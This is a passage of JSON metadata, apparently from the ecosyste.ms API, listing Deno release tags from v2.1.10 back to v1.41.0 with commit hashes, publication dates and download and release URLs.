yste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"